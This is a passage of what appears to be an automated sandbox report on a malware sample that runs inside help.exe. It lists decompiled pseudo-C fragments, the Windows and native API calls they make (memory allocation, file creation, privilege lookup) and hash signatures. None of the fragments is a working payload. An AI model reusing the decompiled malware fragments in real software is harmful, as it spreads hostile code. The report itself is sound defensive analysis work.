				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                        0x004082f0
                        0x004082ff
                        0x00408303
                        0x0040830e
                        0x0040831e
                        0x0040832e
                        0x00408333
                        0x0040833a
                        0x0040833d
                        0x0040834a
                        0x0040834c
                        0x0040834e
                        0x0040836b
                        0x0040836b
                        0x00000000
                        0x0040836d
                        0x00408372

                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                        • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                        • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                        • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A05D, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0041A05D(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;
				void* _t17;

				_t9 = _a4;
				_t3 = _t9 + 0xc74; // 0xc74
				E0041A950(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}





                        0x0041a063
                        0x0041a06f
                        0x0041a077
                        0x0041a08d
                        0x0041a091

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 212efc3a55c73a629c9c18641576bceee60b43069c2ed8606f8786b9922b2111
                        • Instruction ID: a87f0deeeefb8015adce61304ab1bd6295ab86bc104810a71bb6deb3e954703d
                        • Opcode Fuzzy Hash: 212efc3a55c73a629c9c18641576bceee60b43069c2ed8606f8786b9922b2111
                        • Instruction Fuzzy Hash: DDE04FB12006056FD714DFA9CC49EE77BA9EF88350F114659F91C97251C631E910CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                        0x0041a06f
                        0x0041a077
                        0x0041a08d
                        0x0041a091

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A1B1, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 8fc4e1774a5362d120ab031b8c7bb4455859f6b6d34fb36d0c5de42025429bba
                        • Instruction ID: f999fc605822e425a02ccbc90597ee93ea479b9d775433ea2688004a293f8c07
                        • Opcode Fuzzy Hash: 8fc4e1774a5362d120ab031b8c7bb4455859f6b6d34fb36d0c5de42025429bba
                        • Instruction Fuzzy Hash: BCE09AB02082503BCB10DB258C81EDB3FA8DF89260F18859AF88817202C538A46487B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A1BB, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 7a59bc80923bf4ded264193f4aab42e93d095830751d07d639aef5d5ecc7878a
                        • Instruction ID: fe08283665652ced38bf7f6f3b7d618161e84c27e14499dacb9060dfb59d20e2
                        • Opcode Fuzzy Hash: 7a59bc80923bf4ded264193f4aab42e93d095830751d07d639aef5d5ecc7878a
                        • Instruction Fuzzy Hash: 75E04FB56002046FDB10DF45DC86EE777A9EF88760F018555FE4C5B242D934E9508BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A092, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E0041A092(intOrPtr _a4, int _a8) {
				void* _t5;
				void* _t16;

				asm("outsb");
				 *0xe61fadb4 = _t5 - 0x61;
				_t8 = _a4;
				E0041A950(_t16, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}





                        0x0041a093
                        0x0041a096
                        0x0041a0a3
                        0x0041a0ba
                        0x0041a0c8

                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: f174ed7a6cc0383e1bc0b746e138063a90d4fe1c5f1db2927655cf390978c118
                        • Instruction ID: 1d063885dd3c017bc8dd67df55b749204f85431882b9801c8c7610f30eb97a14
                        • Opcode Fuzzy Hash: f174ed7a6cc0383e1bc0b746e138063a90d4fe1c5f1db2927655cf390978c118
                        • Instruction Fuzzy Hash: 3AE026B0211200AFD620CF64CC85FC73FA5AF58750F088555BA585F342C534AA00C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                        0x0041a0a3
                        0x0041a0ba
                        0x0041a0c8

                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00407AFA, Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E00407AFA(char __eax, void* __ebx, void* __ecx, void* __esi) {

				_push(__eax);
				 *((char*)(__eax - 0x17)) = __eax;
				 *((intOrPtr*)(__esi + 0x35)) =  *((intOrPtr*)(__esi + 0x35)) - __eax;
				asm("sbb ah, [ecx-0x2d]");
				return 1;
			}



                        0x00407afa
                        0x00407afb
                        0x00407afe
                        0x00407b08
                        0x00407b1a

                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8c99288312cf61a83f808d8210851dee2f98ecb823c7b058a2087e4f0a9a1208
                        • Instruction ID: 8eaa88adb882a7b9ca66d15baf5b2a18225c1985b38d345928df3fc1abd6908e
                        • Opcode Fuzzy Hash: 8c99288312cf61a83f808d8210851dee2f98ecb823c7b058a2087e4f0a9a1208
                        • Instruction Fuzzy Hash: C6D012219191C40ED3514E3DA4583B9FFF8DF5B115F0821EFDC8C9B612D942D49183A9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00417D6A, Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E00417D6A(void* __eax, void* __edx, void* __fp0) {

				asm("cld");
				return __eax;
			}



                        0x00417d6e
                        0x00417d79

                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 431879c90aae6d52ebbd29242ba8ee3710ad2188535c33ae1ac0a3f433997142
                        • Instruction ID: 86dbae54e1d7f2d6806d8e0e661e90bac83b547bf6bb713b955fe50c1bfcd7f5
                        • Opcode Fuzzy Hash: 431879c90aae6d52ebbd29242ba8ee3710ad2188535c33ae1ac0a3f433997142
                        • Instruction Fuzzy Hash: 05B01213F0100C0045201E49B8000F5F334D1C70FBE1173A7DD0CB34008403C52401DC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Analysis Process: help.exe PID: 5040 Parent PID: 3440 help.exeCOMMON

                        Executed Functions

                        Function 00499D4B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wKI,007A002E,00000000,00000060,00000000,00000000), ref: 00499D9D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`$wKI
                        • API String ID: 823142352-1392962835
                        • Opcode ID: 80996dbe2ca3641d390339bd1b78e4fb7c5dcb55ba60791c5899aee99d2878a5
                        • Instruction ID: 98c05ee266a6dcfbb8d21a9be0cb4d6a442089adf8a131950dba7bd7db3a2220
                        • Opcode Fuzzy Hash: 80996dbe2ca3641d390339bd1b78e4fb7c5dcb55ba60791c5899aee99d2878a5
                        • Instruction Fuzzy Hash: 8301E4B2200109BBCB08CF98DC85EEB77A9AF8C754F158248FA5D97241C630E811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00499D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wKI,007A002E,00000000,00000060,00000000,00000000), ref: 00499D9D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`$wKI
                        • API String ID: 823142352-1392962835
                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction ID: 97a92ae4c2c266d7e8fe84036a901aa511d1aea3c31d1be6e08119eab301c8cb
                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction Fuzzy Hash: F7F0BDB2200208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00499F2D, Relevance: 1.6, APIs: 1, Instructions: 50memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00482D11,00002000,00003000,00000004), ref: 00499F69
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: d6b25e2f8bb1222dd64fda5c28b3e4b263ea45a0a9cecce9c60d2ab0f49de05a
                        • Instruction ID: 803413e39a0dadf72057534054408de810c45351d0a62ec171882a66b3f86eca
                        • Opcode Fuzzy Hash: d6b25e2f8bb1222dd64fda5c28b3e4b263ea45a0a9cecce9c60d2ab0f49de05a
                        • Instruction Fuzzy Hash: 040112B2200209AFCB08DF89DC81EAB77ADEF88314F118519FE5997241C634E820CBF4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00499E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtReadFile.NTDLL(?,?,FFFFFFFF,004949F1,?,?,?,?,004949F1,FFFFFFFF,?,2MI,?,00000000), ref: 00499E45
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction ID: 1c58368c15a2fa15c476183430405eb94a5c6b125596b33a41bb8134603823c2
                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction Fuzzy Hash: 7CF0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F158659BE1D97241D630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00499F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00482D11,00002000,00003000,00000004), ref: 00499F69
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction ID: 1c949b96e676d0120fcb5ca6ba071d3f1a634fe98e00740c74580087da250a61
                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction Fuzzy Hash: C6F015B2200208AFCB14DF89CC81EAB77ADAF88754F118559BE1897241C630F810CBE4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00499E7A, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtClose.NTDLL(00494D10,?,?,00494D10,00000000,FFFFFFFF), ref: 00499EA5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 237f0b0ffd172581ca5bda365d842472bd6826656995c823854bab60ced388a1
                        • Instruction ID: 3b5865e146b5f85002ea7767cb375d37ee5135e4a6258acd39a11717300f4c08
                        • Opcode Fuzzy Hash: 237f0b0ffd172581ca5bda365d842472bd6826656995c823854bab60ced388a1
                        • Instruction Fuzzy Hash: 03E08C71200210BBEB10EBA4CC85E977B68FF49310F1184AAFA2C9B242D630A60087D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00499E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtClose.NTDLL(00494D10,?,?,00494D10,00000000,FFFFFFFF), ref: 00499EA5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction ID: 3c4be89abaee967ef4a3f5c02ac6b9cf4ee52eecc81dcd3f18f0687a62220058
                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction Fuzzy Hash: EDD01776200214ABDB10EB99CC86EA77BACEF48760F1544A9BA5C9B242C530FA1086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 11dd1b85662aaad600b5f1cf714ddc28b38de9e0beca919b11e95ab32052caf6
                        • Instruction ID: 41eef3010420c066ec62bbc59af5f5d9840f0025d2ee7d7b7f7bbcd71485786b
                        • Opcode Fuzzy Hash: 11dd1b85662aaad600b5f1cf714ddc28b38de9e0beca919b11e95ab32052caf6
                        • Instruction Fuzzy Hash: 8690026231180152D20065694C54B07000597D0343F51C159A0144594DCD5589717561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 4a956812789da644b978d87cbcbd6dfe2ba0a598084772bdf7df3a3459f9d5f3
                        • Instruction ID: 29c032ab5a4b43c9a59f5b174acb349ba7f1f2c15d503781165b2e192cf85e24
                        • Opcode Fuzzy Hash: 4a956812789da644b978d87cbcbd6dfe2ba0a598084772bdf7df3a3459f9d5f3
                        • Instruction Fuzzy Hash: AA90027230100523D11161594544707000997D0281F91C456A0414598E9A968A62B161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 53035e5fa1ef18c212784949f7cd3874a597304d7cfdf7a57cd589c694ffedfb
                        • Instruction ID: 625ed9c01c9c84ef92776903ac682d018d84fa346cf9c9678850c5903545ddd3
                        • Opcode Fuzzy Hash: 53035e5fa1ef18c212784949f7cd3874a597304d7cfdf7a57cd589c694ffedfb
                        • Instruction Fuzzy Hash: 1D900262342042625545B15944445074006A7E0281791C056A1404990D89669966F661
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 24792e8080da6aefad94a53b5e96be0fa20c971a0b7c9c5f55a05f8faecb2cb4
                        • Instruction ID: 0c067067e5b4e20f29f30372725fd09a8a65d54bbf4af6d500ae4369d47eb1bc
                        • Opcode Fuzzy Hash: 24792e8080da6aefad94a53b5e96be0fa20c971a0b7c9c5f55a05f8faecb2cb4
                        • Instruction Fuzzy Hash: 729002A234100552D10061594454B070005D7E1341F51C059E1054594E8A59CD627166
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a2834a363dba75d8522f2b004aee1b05509319015e027a11879271a6324d1d75
                        • Instruction ID: ea1b2bce12048d3791479f3548c0385db784346976b98fece1a99942031c0209
                        • Opcode Fuzzy Hash: a2834a363dba75d8522f2b004aee1b05509319015e027a11879271a6324d1d75
                        • Instruction Fuzzy Hash: 889002B230100512D14071594444747000597D0341F51C055A5054594F8A998EE576A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: f7e0be624a905a82763053301e92bfd4811b16140c852a4c819a850ca7213796
                        • Instruction ID: 19c28a8c2709a69bb18ceee5ca81e5dcbed2dc807e305d72fa3bf2c12d8726b0
                        • Opcode Fuzzy Hash: f7e0be624a905a82763053301e92bfd4811b16140c852a4c819a850ca7213796
                        • Instruction Fuzzy Hash: DA90027230108912D1106159844474B000597D0341F55C455A4414698E8AD589A17161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B396D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0097e92b0e67fa758fa00ee005fe26d26dff5bf700adcf05332a780858dfee80
                        • Instruction ID: dfb505904cc45d1a0dcd106d9d0749e2066a45d9274d5d9570d31f57b18c4871
                        • Opcode Fuzzy Hash: 0097e92b0e67fa758fa00ee005fe26d26dff5bf700adcf05332a780858dfee80
                        • Instruction Fuzzy Hash: 7F90027230100952D10061594444B47000597E0341F51C05AA0114694E8A55C9617561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ab1bbecac591ce1c74e724e3b67913b5f6bb607627cf5d00eac19659ec5147cc
                        • Instruction ID: b5afad634c3e90463ed8b5256f8c3dec9fecdcd61996e47c83a24b219f694346
                        • Opcode Fuzzy Hash: ab1bbecac591ce1c74e724e3b67913b5f6bb607627cf5d00eac19659ec5147cc
                        • Instruction Fuzzy Hash: 9C90027230100912D1807159444464B000597D1341F91C059A0015694ECE558B6977E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 40745eff11caea04bb4d897c83776eca3c74b9c29a8d819376355908c957ffe2
                        • Instruction ID: 6734a70e775681debcc1b6ef37770fb25dee7cc8b66adb72768844fc870993a5
                        • Opcode Fuzzy Hash: 40745eff11caea04bb4d897c83776eca3c74b9c29a8d819376355908c957ffe2
                        • Instruction Fuzzy Hash: B490027230504952D14071594444A47001597D0345F51C055A00546D4E9A658E65B6A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
